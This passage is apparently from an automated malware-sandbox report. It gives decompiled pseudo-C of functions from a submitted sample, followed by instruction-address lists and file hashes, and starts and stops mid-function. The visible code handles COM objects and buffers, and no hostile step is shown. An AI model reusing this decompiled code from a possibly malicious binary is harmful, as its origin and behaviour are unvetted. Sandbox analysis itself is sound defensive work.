									_t453 =  *((intOrPtr*)(_t494 + 0x60));
									_t358 =  *((intOrPtr*)(_t494 + 0x38));
									_t407 =  *(_t453 + 4 + _t488 * 4);
									 *((intOrPtr*)(_t496 - 0x48)) =  *((intOrPtr*)(_t358 + _t407 * 8)) -  *((intOrPtr*)(_t358 +  *(_t453 + _t488 * 4) * 8));
									asm("sbb ecx, [eax+edi*8+0x4]");
									_t488 =  *(_t496 + 0x14);
									_t475 = _t474 + 1;
									__eflags = _t475;
									 *(_t496 - 0x28) = _t475;
									 *((intOrPtr*)(_t496 - 0x44)) =  *((intOrPtr*)(_t358 + 4 + _t407 * 8));
									_t474 =  *( *((intOrPtr*)(_t494 + 0x160)) + _t488 * 4);
									_t360 =  *(_t496 - 0x20);
									while(1) {
										_t360 = _t360 + 1;
										__eflags = _t360 -  *((intOrPtr*)(_t496 + 0x10));
										if(_t360 >=  *((intOrPtr*)(_t496 + 0x10))) {
											break;
										}
										__eflags =  *(_t496 + 0x1b);
										if( *(_t496 + 0x1b) == 0) {
											_t459 =  *( *((intOrPtr*)(_t496 + 0xc)) + _t360 * 4);
										} else {
											_t459 = _t360;
										}
										_t408 =  *((intOrPtr*)(_t494 + 0x164));
										__eflags =  *((intOrPtr*)(_t408 + _t459 * 4)) - _t488;
										if( *((intOrPtr*)(_t408 + _t459 * 4)) != _t488) {
											break;
										} else {
											__eflags = _t459 -  *(_t496 - 0x28);
											if(_t459 <  *(_t496 - 0x28)) {
												break;
											}
											 *(_t496 - 0x28) = _t459 + 1;
											continue;
										}
									}
									_t361 = _t360 -  *(_t496 - 0x20);
									__eflags = _t361;
									 *(_t496 + 0x14) = _t474;
									 *(_t496 - 0x40) = _t361;
									while(1) {
										__eflags =  *(_t496 + 0x14) -  *(_t496 - 0x28);
										if( *(_t496 + 0x14) >=  *(_t496 - 0x28)) {
											goto L67;
										}
										 *((intOrPtr*)(_t496 - 0x3c)) =  *((intOrPtr*)(_t496 - 0x3c)) +  *((intOrPtr*)(( *(_t496 + 0x14) << 4) +  *((intOrPtr*)(_t494 + 0x88))));
										asm("adc [ebp-0x38], eax");
										 *(_t496 + 0x14) =  *(_t496 + 0x14) + 1;
									}
									goto L67;
								}
							}
							_t368 =  *(_t496 - 0x18);
							 *(_t496 - 4) = 5;
							__eflags = _t368;
							if(_t368 != 0) {
								 *((intOrPtr*)( *_t368 + 8))(_t368);
							}
							_t369 =  *(_t496 - 0x14);
							 *(_t496 - 4) = 4;
							__eflags = _t369;
							if(_t369 != 0) {
								 *((intOrPtr*)( *_t369 + 8))(_t369);
							}
							 *(_t496 - 4) = 3;
							E0040DC5D(_t496 - 0xa8); // executed
							_t371 =  *(_t496 - 0x24);
							 *(_t496 - 4) = 1;
							__eflags = _t371;
							if(_t371 != 0) {
								 *((intOrPtr*)( *_t371 + 8))(_t371);
							}
							_t372 =  *(_t496 - 0x1c);
							 *(_t496 - 4) =  *(_t496 - 4) & 0x00000000;
							__eflags = _t372;
							if(_t372 != 0) {
								 *((intOrPtr*)( *_t372 + 8))(_t372);
							}
							goto L52;
						}
						_t377 =  *(_t496 - 0x18);
						 *(_t496 - 4) = 5;
						__eflags = _t377;
						if(_t377 != 0) {
							 *((intOrPtr*)( *_t377 + 8))(_t377);
						}
						_t378 =  *(_t496 - 0x14);
						 *(_t496 - 4) = 4;
						__eflags = _t378;
						if(_t378 != 0) {
							 *((intOrPtr*)( *_t378 + 8))(_t378);
						}
						 *(_t496 - 4) = 3;
						E0040DC5D(_t496 - 0xa8);
						_t380 =  *(_t496 - 0x24);
						 *(_t496 - 4) = 1;
						__eflags = _t380;
						if(_t380 != 0) {
							 *((intOrPtr*)( *_t380 + 8))(_t380);
						}
						_t335 =  *(_t496 - 0x1c);
						 *(_t496 - 4) =  *(_t496 - 4) & 0x00000000;
						__eflags = _t335;
						goto L106;
					}
					 *(_t496 - 4) =  *(_t496 - 4) & 0x00000000;
					__eflags = _t400;
					if(_t400 != 0) {
						 *((intOrPtr*)( *_t400 + 8))(_t400);
					}
					goto L121;
				} else {
					 *(_t496 - 4) =  *(_t496 - 4) & 0;
					if(_t483 != 0) {
						 *((intOrPtr*)( *_t483 + 8))(_t483);
					}
					L52:
					_t326 = 0;
					L124:
					 *[fs:0x0] =  *((intOrPtr*)(_t496 - 0xc));
					return _t326;
				}
			}





























































                                                                                                                            0x0040d4b9
                                                                                                                            0x0040d4c7
                                                                                                                            0x0040d4cc
                                                                                                                            0x0040d4d0
                                                                                                                            0x0040d4d3
                                                                                                                            0x0040d4d6
                                                                                                                            0x0040d4d9
                                                                                                                            0x0040d4de
                                                                                                                            0x0040d4de
                                                                                                                            0x0040d4e5
                                                                                                                            0x0040d4e8
                                                                                                                            0x0040d4eb
                                                                                                                            0x0040d4ee
                                                                                                                            0x0040d4f6
                                                                                                                            0x0040d4fa
                                                                                                                            0x0040d502
                                                                                                                            0x0040d502
                                                                                                                            0x0040d50a
                                                                                                                            0x0040d522
                                                                                                                            0x0040d522
                                                                                                                            0x0040d525
                                                                                                                            0x0040d528
                                                                                                                            0x0040d52b
                                                                                                                            0x0040d52e
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040d530
                                                                                                                            0x0040d534
                                                                                                                            0x0040d541
                                                                                                                            0x0040d536
                                                                                                                            0x0040d536
                                                                                                                            0x0040d536
                                                                                                                            0x0040d54a
                                                                                                                            0x0040d54d
                                                                                                                            0x0040d550
                                                                                                                            0x0040d58f
                                                                                                                            0x0040d58f
                                                                                                                            0x00000000
                                                                                                                            0x0040d552
                                                                                                                            0x0040d552
                                                                                                                            0x0040d554
                                                                                                                            0x0040d55a
                                                                                                                            0x0040d560
                                                                                                                            0x0040d563
                                                                                                                            0x0040d563
                                                                                                                            0x0040d566
                                                                                                                            0x0040d566
                                                                                                                            0x0040d569
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040d56e
                                                                                                                            0x0040d57c
                                                                                                                            0x0040d582
                                                                                                                            0x0040d585
                                                                                                                            0x0040d585
                                                                                                                            0x0040d58a
                                                                                                                            0x0040d58a
                                                                                                                            0x0040d58d
                                                                                                                            0x00000000
                                                                                                                            0x0040d58d
                                                                                                                            0x0040d556
                                                                                                                            0x0040d558
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040d558
                                                                                                                            0x0040d550
                                                                                                                            0x0040d5a0
                                                                                                                            0x0040d5a2
                                                                                                                            0x0040d5a4
                                                                                                                            0x0040d5bd
                                                                                                                            0x0040d5c5
                                                                                                                            0x0040d5c7
                                                                                                                            0x0040d5ca
                                                                                                                            0x0040d5cc
                                                                                                                            0x0040d5d0
                                                                                                                            0x0040d5db
                                                                                                                            0x0040d5db
                                                                                                                            0x0040d5d2
                                                                                                                            0x0040d5d7
                                                                                                                            0x0040d5d7
                                                                                                                            0x0040d5dd
                                                                                                                            0x0040d5df
                                                                                                                            0x0040d5e2
                                                                                                                            0x0040d5e6
                                                                                                                            0x0040d5e9
                                                                                                                            0x0040d5ee
                                                                                                                            0x0040d5ee
                                                                                                                            0x0040d5f6
                                                                                                                            0x0040d5fa
                                                                                                                            0x0040d607
                                                                                                                            0x0040d60c
                                                                                                                            0x0040d61c
                                                                                                                            0x0040d620
                                                                                                                            0x0040d622
                                                                                                                            0x0040d62a
                                                                                                                            0x0040d62c
                                                                                                                            0x0040d62f
                                                                                                                            0x0040d631
                                                                                                                            0x0040d635
                                                                                                                            0x0040d640
                                                                                                                            0x0040d640
                                                                                                                            0x0040d637
                                                                                                                            0x0040d63c
                                                                                                                            0x0040d63c
                                                                                                                            0x0040d642
                                                                                                                            0x0040d644
                                                                                                                            0x0040d648
                                                                                                                            0x0040d64b
                                                                                                                            0x0040d64e
                                                                                                                            0x0040d653
                                                                                                                            0x0040d653
                                                                                                                            0x0040d65c
                                                                                                                            0x0040d65c
                                                                                                                            0x0040d65f
                                                                                                                            0x0040d663
                                                                                                                            0x0040d666
                                                                                                                            0x0040d66d
                                                                                                                            0x0040d670
                                                                                                                            0x0040d673
                                                                                                                            0x0040d676
                                                                                                                            0x0040d679
                                                                                                                            0x0040d67f
                                                                                                                            0x0040d67f
                                                                                                                            0x0040d682
                                                                                                                            0x0040d685
                                                                                                                            0x0040d68c
                                                                                                                            0x0040d690
                                                                                                                            0x0040d692
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040d6e4
                                                                                                                            0x0040d6e7
                                                                                                                            0x0040d6ea
                                                                                                                            0x0040d746
                                                                                                                            0x0040d74a
                                                                                                                            0x0040d74d
                                                                                                                            0x0040d750
                                                                                                                            0x0040d753
                                                                                                                            0x0040d756
                                                                                                                            0x0040d75b
                                                                                                                            0x0040d75b
                                                                                                                            0x0040d764
                                                                                                                            0x0040d76b
                                                                                                                            0x0040d76e
                                                                                                                            0x0040d771
                                                                                                                            0x0040d774
                                                                                                                            0x0040d807
                                                                                                                            0x0040d80d
                                                                                                                            0x0040d815
                                                                                                                            0x0040d823
                                                                                                                            0x0040d82b
                                                                                                                            0x0040d82e
                                                                                                                            0x0040d830
                                                                                                                            0x0040d833
                                                                                                                            0x0040d893
                                                                                                                            0x0040d897
                                                                                                                            0x0040da83
                                                                                                                            0x0040da83
                                                                                                                            0x0040da8c
                                                                                                                            0x0040da92
                                                                                                                            0x0040da95
                                                                                                                            0x0040da9b
                                                                                                                            0x00000000
                                                                                                                            0x0040da9b
                                                                                                                            0x0040d89d
                                                                                                                            0x0040d8a6
                                                                                                                            0x0040d8aa
                                                                                                                            0x0040d8ad
                                                                                                                            0x0040d8b1
                                                                                                                            0x0040d8b6
                                                                                                                            0x0040d8b7
                                                                                                                            0x0040d8b8
                                                                                                                            0x0040d8b9
                                                                                                                            0x0040d8be
                                                                                                                            0x0040d8c1
                                                                                                                            0x0040d8c4
                                                                                                                            0x0040d8c8
                                                                                                                            0x0040d8c9
                                                                                                                            0x0040d8ca
                                                                                                                            0x0040d8d6
                                                                                                                            0x0040d8dc
                                                                                                                            0x0040d8dd
                                                                                                                            0x0040d8e2
                                                                                                                            0x0040d8e4
                                                                                                                            0x0040d8e7
                                                                                                                            0x0040d966
                                                                                                                            0x0040d966
                                                                                                                            0x0040d969
                                                                                                                            0x0040d970
                                                                                                                            0x0040d974
                                                                                                                            0x0040d978
                                                                                                                            0x0040d97a
                                                                                                                            0x0040d97c
                                                                                                                            0x0040d981
                                                                                                                            0x0040d988
                                                                                                                            0x0040d98c
                                                                                                                            0x0040d98e
                                                                                                                            0x0040d992
                                                                                                                            0x0040d994
                                                                                                                            0x0040d994
                                                                                                                            0x0040d992
                                                                                                                            0x0040d983
                                                                                                                            0x0040d983
                                                                                                                            0x0040d983
                                                                                                                            0x0040d981
                                                                                                                            0x0040d9a6
                                                                                                                            0x0040d9a8
                                                                                                                            0x0040d9aa
                                                                                                                            0x0040da06
                                                                                                                            0x0040da0a
                                                                                                                            0x0040da7f
                                                                                                                            0x0040da7f
                                                                                                                            0x00000000
                                                                                                                            0x0040da7f
                                                                                                                            0x0040da0c
                                                                                                                            0x0040da0f
                                                                                                                            0x0040da11
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040da1c
                                                                                                                            0x0040da1f
                                                                                                                            0x0040da1f
                                                                                                                            0x0040da21
                                                                                                                            0x0040da23
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040da25
                                                                                                                            0x0040da28
                                                                                                                            0x0040da2c
                                                                                                                            0x0040da2e
                                                                                                                            0x0040da33
                                                                                                                            0x0040da33
                                                                                                                            0x0040da36
                                                                                                                            0x0040da39
                                                                                                                            0x0040da3d
                                                                                                                            0x0040da3f
                                                                                                                            0x0040da44
                                                                                                                            0x0040da44
                                                                                                                            0x0040da4d
                                                                                                                            0x0040da51
                                                                                                                            0x0040da56
                                                                                                                            0x0040da59
                                                                                                                            0x0040da5d
                                                                                                                            0x0040da5f
                                                                                                                            0x0040da64
                                                                                                                            0x0040da64
                                                                                                                            0x0040da67
                                                                                                                            0x0040da6a
                                                                                                                            0x0040da6e
                                                                                                                            0x0040da70
                                                                                                                            0x0040da75
                                                                                                                            0x0040da75
                                                                                                                            0x0040da78
                                                                                                                            0x0040da78
                                                                                                                            0x0040d9ac
                                                                                                                            0x0040d9ac
                                                                                                                            0x0040d9af
                                                                                                                            0x0040d9b3
                                                                                                                            0x0040d9b5
                                                                                                                            0x0040d9ba
                                                                                                                            0x0040d9ba
                                                                                                                            0x0040d9bd
                                                                                                                            0x0040d9c0
                                                                                                                            0x0040d9c4
                                                                                                                            0x0040d9c6
                                                                                                                            0x0040d9cb
                                                                                                                            0x0040d9cb
                                                                                                                            0x0040d9d4
                                                                                                                            0x0040d9d8
                                                                                                                            0x0040d9dd
                                                                                                                            0x0040d9e0
                                                                                                                            0x0040d9e4
                                                                                                                            0x0040d9e6
                                                                                                                            0x0040d9eb
                                                                                                                            0x0040d9eb
                                                                                                                            0x0040d9ee
                                                                                                                            0x0040d9f1
                                                                                                                            0x0040d9f5
                                                                                                                            0x0040d9f7
                                                                                                                            0x0040d9f7
                                                                                                                            0x0040d9fc
                                                                                                                            0x0040d9fc
                                                                                                                            0x0040d9ff
                                                                                                                            0x0040d9ff
                                                                                                                            0x00000000
                                                                                                                            0x0040d9aa
                                                                                                                            0x0040d8e9
                                                                                                                            0x0040d8ee
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040d8f0
                                                                                                                            0x0040d8f4
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040d8f6
                                                                                                                            0x0040d8f8
                                                                                                                            0x0040d95c
                                                                                                                            0x00000000
                                                                                                                            0x0040d95c
                                                                                                                            0x0040d8fa
                                                                                                                            0x0040d8fe
                                                                                                                            0x0040d902
                                                                                                                            0x0040d904
                                                                                                                            0x0040d90a
                                                                                                                            0x0040d90a
                                                                                                                            0x0040d90d
                                                                                                                            0x0040d910
                                                                                                                            0x0040d914
                                                                                                                            0x0040d916
                                                                                                                            0x0040d91b
                                                                                                                            0x0040d91b
                                                                                                                            0x0040d924
                                                                                                                            0x0040d928
                                                                                                                            0x0040d92d
                                                                                                                            0x0040d930
                                                                                                                            0x0040d934
                                                                                                                            0x0040d936
                                                                                                                            0x0040d93b
                                                                                                                            0x0040d93b
                                                                                                                            0x0040d93e
                                                                                                                            0x0040d941
                                                                                                                            0x0040d945
                                                                                                                            0x0040d947
                                                                                                                            0x0040d94c
                                                                                                                            0x0040d94c
                                                                                                                            0x0040d94f
                                                                                                                            0x00000000
                                                                                                                            0x0040d94f
                                                                                                                            0x0040d835
                                                                                                                            0x0040d838
                                                                                                                            0x0040d83c
                                                                                                                            0x0040d83e
                                                                                                                            0x0040d843
                                                                                                                            0x0040d843
                                                                                                                            0x0040d846
                                                                                                                            0x0040d849
                                                                                                                            0x0040d84d
                                                                                                                            0x0040d84f
                                                                                                                            0x0040d854
                                                                                                                            0x0040d854
                                                                                                                            0x0040d85d
                                                                                                                            0x0040d861
                                                                                                                            0x0040d866
                                                                                                                            0x0040d869
                                                                                                                            0x0040d86d
                                                                                                                            0x0040d86f
                                                                                                                            0x0040d874
                                                                                                                            0x0040d874
                                                                                                                            0x0040d877
                                                                                                                            0x0040d87a
                                                                                                                            0x0040d87e
                                                                                                                            0x0040d880
                                                                                                                            0x0040d885
                                                                                                                            0x0040d885
                                                                                                                            0x0040d888
                                                                                                                            0x00000000
                                                                                                                            0x0040d77a
                                                                                                                            0x0040d77a
                                                                                                                            0x0040d77d
                                                                                                                            0x0040d780
                                                                                                                            0x0040d78d
                                                                                                                            0x0040d794
                                                                                                                            0x0040d79e
                                                                                                                            0x0040d7a1
                                                                                                                            0x0040d7a1
                                                                                                                            0x0040d7a2
                                                                                                                            0x0040d7a5
                                                                                                                            0x0040d7a8
                                                                                                                            0x0040d7ab
                                                                                                                            0x0040d7ae
                                                                                                                            0x0040d7ae
                                                                                                                            0x0040d7af
                                                                                                                            0x0040d7b2
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040d7b4
                                                                                                                            0x0040d7b8
                                                                                                                            0x0040d7c1
                                                                                                                            0x0040d7ba
                                                                                                                            0x0040d7ba
                                                                                                                            0x0040d7ba
                                                                                                                            0x0040d7c4
                                                                                                                            0x0040d7ca
                                                                                                                            0x0040d7cd
                                                                                                                            0x00000000
                                                                                                                            0x0040d7cf
                                                                                                                            0x0040d7cf
                                                                                                                            0x0040d7d2
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040d7d5
                                                                                                                            0x00000000
                                                                                                                            0x0040d7d5
                                                                                                                            0x0040d7cd
                                                                                                                            0x0040d7da
                                                                                                                            0x0040d7da
                                                                                                                            0x0040d7dd
                                                                                                                            0x0040d7e0
                                                                                                                            0x0040d7e3
                                                                                                                            0x0040d7e6
                                                                                                                            0x0040d7e9
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040d7fc
                                                                                                                            0x0040d7ff
                                                                                                                            0x0040d802
                                                                                                                            0x0040d802
                                                                                                                            0x00000000
                                                                                                                            0x0040d7e3
                                                                                                                            0x0040d774
                                                                                                                            0x0040d6ec
                                                                                                                            0x0040d6ef
                                                                                                                            0x0040d6f3
                                                                                                                            0x0040d6f5
                                                                                                                            0x0040d6fa
                                                                                                                            0x0040d6fa
                                                                                                                            0x0040d6fd
                                                                                                                            0x0040d700
                                                                                                                            0x0040d704
                                                                                                                            0x0040d706
                                                                                                                            0x0040d70b
                                                                                                                            0x0040d70b
                                                                                                                            0x0040d714
                                                                                                                            0x0040d718
                                                                                                                            0x0040d71d
                                                                                                                            0x0040d720
                                                                                                                            0x0040d724
                                                                                                                            0x0040d726
                                                                                                                            0x0040d72b
                                                                                                                            0x0040d72b
                                                                                                                            0x0040d72e
                                                                                                                            0x0040d731
                                                                                                                            0x0040d735
                                                                                                                            0x0040d737
                                                                                                                            0x0040d73c
                                                                                                                            0x0040d73c
                                                                                                                            0x00000000
                                                                                                                            0x0040d737
                                                                                                                            0x0040d694
                                                                                                                            0x0040d697
                                                                                                                            0x0040d69b
                                                                                                                            0x0040d69d
                                                                                                                            0x0040d6a2
                                                                                                                            0x0040d6a2
                                                                                                                            0x0040d6a5
                                                                                                                            0x0040d6a8
                                                                                                                            0x0040d6ac
                                                                                                                            0x0040d6ae
                                                                                                                            0x0040d6b3
                                                                                                                            0x0040d6b3
                                                                                                                            0x0040d6bc
                                                                                                                            0x0040d6c0
                                                                                                                            0x0040d6c5
                                                                                                                            0x0040d6c8
                                                                                                                            0x0040d6cc
                                                                                                                            0x0040d6ce
                                                                                                                            0x0040d6d3
                                                                                                                            0x0040d6d3
                                                                                                                            0x0040d6d6
                                                                                                                            0x0040d6d9
                                                                                                                            0x0040d6dd
                                                                                                                            0x00000000
                                                                                                                            0x0040d6dd
                                                                                                                            0x0040d5a6
                                                                                                                            0x0040d5aa
                                                                                                                            0x0040d5ac
                                                                                                                            0x0040d5b5
                                                                                                                            0x0040d5b5
                                                                                                                            0x00000000
                                                                                                                            0x0040d50c
                                                                                                                            0x0040d50c
                                                                                                                            0x0040d511
                                                                                                                            0x0040d51a
                                                                                                                            0x0040d51a
                                                                                                                            0x0040d73f
                                                                                                                            0x0040d73f
                                                                                                                            0x0040db7d
                                                                                                                            0x0040db82
                                                                                                                            0x0040db8b
                                                                                                                            0x0040db8b

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3519838083-0
                                                                                                                            • Opcode ID: bab2c70395a9ac63ff2a1e6cf90ccf3ca4ad1d567fbb6c2056be4227cc6cc286
                                                                                                                            • Instruction ID: f668b284c9a992d87cd6d5ed2065a62fb7c1b42155693d61c0c1031baec4afb4
                                                                                                                            • Opcode Fuzzy Hash: bab2c70395a9ac63ff2a1e6cf90ccf3ca4ad1d567fbb6c2056be4227cc6cc286
                                                                                                                            • Instruction Fuzzy Hash: 9F327F70E04249DFDF11CFE8C984BAEBBB5AF49304F1440AAE845A7391C779AE49CB15
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040A90A Relevance: 2.0, APIs: 1, Instructions: 486COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 93%
                                                                                                                            			E0040A90A(signed int __ecx, void* __eflags) {
				void* _t241;
				void* _t244;
				signed int _t245;
				signed int _t246;
				signed int* _t247;
				signed int _t248;
				signed int* _t252;
				signed int* _t255;
				signed int _t256;
				signed int _t257;
				signed int _t259;
				signed int _t260;
				void* _t262;
				signed int* _t263;
				signed int _t267;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t276;
				signed int _t278;
				signed int _t279;
				signed int _t280;
				intOrPtr* _t284;
				void* _t288;
				void*** _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t328;
				signed int _t329;
				signed int _t330;
				signed int _t335;
				signed int _t341;
				intOrPtr* _t356;
				signed int _t360;
				signed int _t362;
				signed int _t365;
				signed int _t381;
				void** _t418;
				signed int _t420;
				signed int _t421;
				signed int _t424;
				signed int _t426;
				void*** _t434;
				signed int _t441;
				signed int** _t459;
				signed int _t460;
				signed int _t461;
				intOrPtr _t465;
				void* _t469;
				void* _t471;
				void* _t472;
				void* _t474;

				E00418D80(E00419E9D, _t469);
				_t472 = _t471 - 0x290;
				 *(_t469 - 0x1c) = __ecx;
				E0040A8E3(__ecx, __eflags);
				_t356 =  *((intOrPtr*)(_t469 + 8));
				if(( *(_t356 + 0x28))[1] < 0x20) {
					while(1) {
						 *(_t469 - 0x20) =  *(_t469 - 0x20) & 0x00000000;
						_t241 = E004028F5(_t469 - 0x29c);
						_t360 = 8;
						_t244 = memcpy(_t356 + 8, _t241, _t360 << 2);
						_t472 = _t472 + 0xc;
						__eflags =  *_t244 - 1;
						if( *_t244 < 1) {
							goto L7;
						}
						L3:
						E004028F5(_t469 - 0xbc);
						_t434 =  *(_t356 + 0x28);
						_t465 =  *((intOrPtr*)( *(_t469 - 0x1c) + 4));
						_t418 = _t434[1];
						__eflags = _t465 - _t418;
						if(_t465 >= _t418) {
							_t420 = 8;
							memcpy(_t469 - 0xbc,  *( *_t434), _t420 << 2);
							_t474 = _t472 + 0xc;
							_t362 = 0;
							__eflags =  *((char*)(_t469 - 0xac));
							if( *((char*)(_t469 - 0xac)) == 0) {
								goto L63;
							}
							goto L6;
						} else {
							_t424 = 8;
							memcpy(_t469 - 0xbc,  *( *_t434 + (_t418 - _t465) * 4 - 4), _t424 << 2);
							_t474 = _t472 + 0xc;
							L6:
							_t421 = 8;
							_t244 = memcpy(_t356 + 8, _t469 - 0xbc, _t421 << 2);
							_t472 = _t474 + 0xc;
							L8:
							_t426 =  *(_t469 - 0x1c);
							_t441 = 0;
							_t365 =  *(_t426 + 4);
							__eflags = _t365;
							if(_t365 != 0) {
								__eflags =  *_t244 - _t365;
								_t459 =  *( *_t426 + _t365 * 4 - 4);
								 *(_t469 - 0x4c) = _t459;
								if( *_t244 > _t365) {
									 *(_t469 - 0x20) = 0x80004001;
								}
								 *(_t469 - 0x44) = _t441;
								 *(_t469 - 0x42) = _t441;
								 *(_t469 - 0x3c) = _t441;
								_t247 =  *_t459;
								 *(_t469 - 4) = 1;
								_t248 =  *((intOrPtr*)( *_t247 + 0x20))(_t247, 1, _t469 - 0x44);
								__eflags = _t248 - _t441;
								if(_t248 != _t441) {
									L42:
									_t460 = _t248;
									E00405DEF(_t469 - 0x44);
									L72:
									_t246 = _t460;
									goto L65;
								}
								__eflags =  *(_t469 - 0x44) - 0x13;
								if( *(_t469 - 0x44) != 0x13) {
									_t362 = _t469 - 0x44;
									L84:
									E00405DEF(_t362);
									L64:
									_t245 =  *(_t469 - 0x1c);
									__eflags =  *((intOrPtr*)(_t245 + 4)) - _t441;
									_t205 =  *((intOrPtr*)(_t245 + 4)) != _t441;
									__eflags = _t205;
									 *((char*)(_t245 + 0x20)) = _t362 & 0xffffff00 | _t205;
									_t246 =  *(_t469 - 0x20);
									goto L65;
								}
								 *(_t469 - 0x24) =  *(_t469 - 0x3c);
								_t252 =  *_t459;
								_t248 =  *((intOrPtr*)( *_t252 + 0x14))(_t252, _t469 - 0x48);
								__eflags = _t248 - _t441;
								if(_t248 != _t441) {
									goto L42;
								}
								_t362 = _t469 - 0x44;
								__eflags =  *(_t469 - 0x24) -  *((intOrPtr*)(_t469 - 0x48));
								if( *(_t469 - 0x24) >=  *((intOrPtr*)(_t469 - 0x48))) {
									goto L84;
								}
								E00405DEF(_t362);
								 *(_t469 - 0x10) = _t441;
								_t255 =  *_t459;
								_t362 =  *_t255;
								 *(_t469 - 4) = 2;
								_t256 =  *_t362(_t255, 0x41b210, _t469 - 0x10);
								__eflags = _t256;
								_t257 =  *(_t469 - 0x10);
								if(_t256 != 0) {
									L82:
									 *(_t469 - 4) =  *(_t469 - 4) | 0xffffffff;
									L79:
									__eflags = _t257 - _t441;
									if(_t257 != _t441) {
										_t362 =  *_t257;
										 *((intOrPtr*)(_t362 + 8))(_t257);
									}
									goto L64;
								}
								__eflags = _t257 - _t441;
								if(_t257 == _t441) {
									goto L82;
								}
								 *(_t469 - 0x14) = _t441;
								_t362 =  *_t257;
								 *(_t469 - 4) = 3;
								_t259 =  *((intOrPtr*)(_t362 + 0xc))(_t257,  *(_t469 - 0x24), _t469 - 0x14);
								__eflags = _t259;
								_t260 =  *(_t469 - 0x14);
								if(_t259 != 0) {
									L81:
									 *(_t469 - 4) = 2;
									L76:
									__eflags = _t260 - _t441;
									if(_t260 != _t441) {
										_t362 =  *_t260;
										 *((intOrPtr*)(_t362 + 8))(_t260);
									}
									_t228 = _t469 - 4;
									 *_t228 =  *(_t469 - 4) | 0xffffffff;
									__eflags =  *_t228;
									_t257 =  *(_t469 - 0x10);
									goto L79;
								}
								__eflags = _t260 - _t441;
								if(_t260 == _t441) {
									goto L81;
								}
								 *(_t469 - 0x18) = _t441;
								_t362 =  *_t260;
								 *(_t469 - 4) = 4;
								_t262 =  *_t362(_t260, 0x41b390, _t469 - 0x18);
								__eflags = _t262 - _t441;
								_t263 =  *(_t469 - 0x18);
								if(_t262 != _t441) {
									L73:
									__eflags = _t263 - _t441;
									 *(_t469 - 4) = 3;
									if(_t263 != _t441) {
										_t362 =  *_t263;
										 *((intOrPtr*)(_t362 + 8))(_t263);
									}
									_t260 =  *(_t469 - 0x14);
									 *(_t469 - 4) = 2;
									goto L76;
								}
								__eflags = _t263 - _t441;
								if(_t263 == _t441) {
									goto L73;
								}
								E0040AF06(_t469 - 0x19c);
								 *(_t469 - 4) = 5;
								_t267 = E00409683(_t459,  *(_t469 - 0x24), _t469 - 0x12c);
								__eflags = _t267 - _t441;
								 *(_t469 - 0x20) = _t267;
								if(_t267 != _t441) {
									 *(_t469 - 4) = 4;
									E00402F6E(_t469 - 0x19c);
									_t269 =  *(_t469 - 0x18);
									 *(_t469 - 4) = 3;
									__eflags = _t269 - _t441;
									if(_t269 != _t441) {
										 *((intOrPtr*)( *_t269 + 8))(_t269);
									}
									_t270 =  *(_t469 - 0x14);
									 *(_t469 - 4) = 2;
									__eflags = _t270 - _t441;
									if(_t270 != _t441) {
										 *((intOrPtr*)( *_t270 + 8))(_t270);
									}
									_t271 =  *(_t469 - 0x10);
									 *(_t469 - 4) =  *(_t469 - 4) | 0xffffffff;
									__eflags = _t271 - _t441;
									if(_t271 != _t441) {
										 *((intOrPtr*)( *_t271 + 8))(_t271);
									}
									_t246 =  *(_t469 - 0x20);
									goto L65;
								}
								_t461 =  *(_t469 - 0x24);
								_t276 = E00409616( *_t459, _t461, 0x56, _t469 + 0xb);
								__eflags = _t276 - _t441;
								 *(_t469 - 0x20) = _t276;
								if(_t276 != _t441) {
									 *(_t469 - 4) = 4;
									E00402F6E(_t469 - 0x19c);
									_t278 =  *(_t469 - 0x18);
									 *(_t469 - 4) = 3;
									__eflags = _t278 - _t441;
									if(_t278 != _t441) {
										 *((intOrPtr*)( *_t278 + 8))(_t278);
									}
									_t279 =  *(_t469 - 0x14);
									 *(_t469 - 4) = 2;
									__eflags = _t279 - _t441;
									if(_t279 != _t441) {
										 *((intOrPtr*)( *_t279 + 8))(_t279);
									}
									_t280 =  *(_t469 - 0x10);
									 *(_t469 - 4) =  *(_t469 - 4) | 0xffffffff;
									__eflags = _t280 - _t441;
									if(_t280 != _t441) {
										 *((intOrPtr*)( *_t280 + 8))(_t280);
									}
									_t246 =  *(_t469 - 0x20);
									goto L65;
								}
								_t284 =  *((intOrPtr*)(_t356 + 0x38));
								__eflags = _t284 - _t441;
								if(_t284 != _t441) {
									 *(_t469 - 0x28) = _t441;
									 *(_t469 - 4) = 6;
									 *((intOrPtr*)( *_t284))(_t284, 0x41b200, _t469 - 0x28);
